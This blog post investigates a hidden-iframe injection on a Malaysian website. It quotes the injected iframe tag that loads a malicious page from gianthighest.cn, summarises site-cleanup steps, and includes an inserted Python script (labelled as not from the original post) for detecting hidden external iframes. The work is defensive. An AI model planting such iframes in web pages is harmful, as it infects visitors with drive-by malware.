
TMonline is a harmful website!!??? (Part II)

I have been looking more into the matter of www.tmonline.com.my and found some more answers.

In the source code of the website, I found this:
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"><iframe src="http://gianthighest.cn:8080/index.php" width=120 height=176 style="visibility: hidden"></iframe>
<div align="center">

OK, so what is this gianthighest.cn? It doesn't seem to belong to TM.

Going to the site, I didn't get any clues as I got a blank page. So that was disappointing... I was expecting to see some code. So I searched for more information.

Google has a tool called the Safe Browsing diagnostic tool. To use it, just append a URL to the end of http://www.google.com/safebrowsing/diagnostic?site=. So let's test... http://www.google.com/safebrowsing/diagnostic?site=www.tmonline.com.my. Here is the result.

Here we see that malicious software is being hosted on gianthighest.cn. Google confirms that when it visited the site, 2 out of 3 pages tested resulted in malicious software being downloaded and installed without user consent.

OK, good, maybe we are getting somewhere here.

After running into lots of dead ends, I finally found something called .cn iframe attacks. Here are the links: http://blog.unmaskparasites.com/2009/06/25/hidden-cn-iframes-are-still-p... and http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from...

Basically what is happening is, as the code I pasted above indicates, that a hidden iframe was injected into the website. This iframe loads a script that checks which plugins are installed in your browser. Depending on the result of this check, it serves either a malicious PDF or a malicious SWF file.

What I detected was the PDF file, and I got similar results to what was posted on http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from... (a stack-based buffer overflow).

A check on www.tmonline.com.my using Unmask Parasites tells me:

This page seems to be <suspicious>
1 hidden external link found.
Google currently lists this page as suspicious*

And it goes on to give me a detailed security report on what is suspicious on the page. Here is a screenshot.

If your server has been compromised, you can clean it by doing the following (taken from http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from...):

  1. Start with your own computer. Scan it with anti-virus and anti-spyware tools.
  2. Once you are sure your computer is clean, change all site passwords. (You might want to change computer and network passwords too.)
  3. Now keep the new passwords secure. Don’t use auto-upload features of your web site editors. Enter passwords every time you upload new content instead. Use SFTP instead of FTP if possible.
  4. Now remove the malicious code (the iframes) from your files on the server. The easiest way to do it is to upload clean content from a backup.
  5. Scan your server directories for any new/suspicious files (don’t forget to check hidden files). Remove anything that should not be there.
  6. If your site was flagged by Google, request a malware review via Webmaster Tools.
  7. Regularly check your site with diagnostics tools of your choice (Unmask Parasites can be one of them) to be sure your site is clean.
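The hidden-iframe pattern described above and cleanup step 5 (scanning the server's files) combined into one check, as an added example that is not part of the original post or the Unmask Parasites article: it parses HTML for <iframe> tags that are invisible to the user and point at a host other than the site's own. The site host, the file glob and the sample HTML (built around the tag quoted above, next to a constructed benign local frame) are assumptions.

```python
# Added example (not from the original post): flag <iframe> tags that are hidden
# and point at a host other than the site's own, the pattern described above.
from html.parser import HTMLParser
from pathlib import Path
from urllib.parse import urlparse

class _IframeCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})

def _is_hidden(attrs):
    # visibility:hidden / display:none, or a 0x0 / 1x1 frame: all invisible to the visitor
    style = attrs.get("style", "").replace(" ", "").lower()
    if "visibility:hidden" in style or "display:none" in style:
        return True
    try:
        return int(attrs.get("width", 100)) <= 1 or int(attrs.get("height", 100)) <= 1
    except ValueError:
        return False

def find_hidden_iframes(html, site_host):
    """Return [(src, reason)] for every iframe whose src host is not site_host."""
    parser = _IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or site_host).lower()  # relative src = own host
        if host != site_host.lower():
            reason = "hidden external iframe" if _is_hidden(attrs) else "external iframe"
            findings.append((src, reason))
    return findings

def scan_directory(root, site_host, pattern="*.htm*"):
    """Cleanup step 5: walk the site's files and report suspicious iframes per file."""
    report = {}
    for path in Path(root).rglob(pattern):
        hits = find_hidden_iframes(path.read_text(errors="replace"), site_host)
        if hits:
            report[str(path)] = hits
    return report

# Constructed sample: the injected tag quoted in the post next to a benign local frame.
SAMPLE_HTML = ('<body><iframe src="http://gianthighest.cn:8080/index.php" width=120 height=176 '
               'style="visibility: hidden"></iframe><iframe src="/help/frame.html"></iframe></body>')
```

Run `scan_directory("/path/to/webroot", "www.tmonline.com.my")` over a site's document root to get a per-file list of frames to remove or review; a relative `src` is treated as the site's own and is never flagged.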

Good.

Now how do we report this to TM? Can anybody tell me or help out, please?

Comments

dr syed moto

Pls report to Dr Syed Moto from TM, Azrin

I just went in .. it's OK, right? btw

I just went in .. it's OK, right?

btw tm.online.com.my is not TM's ...

next time call me .. haha



Re: I just went in .. it's OK, right? btw

Dr. Syed Moto, hehe. Maybe this issue was fixed already. Look at my post date. It had been quite some time before your reply. I tried to check it again today, but the site is down. (I should log in to my website more often -_-).

Anyway, the issue was discussed in several forums and other blogs if you need to see other users' experiences, though not to the same degree as I discussed it here. Just do a Google search. :)

And, oh, www.tmonline.com.my is not TM's? Then why is there a copyright to Telekom Malaysia Berhad on the site (I fetched an archived version of the site)?
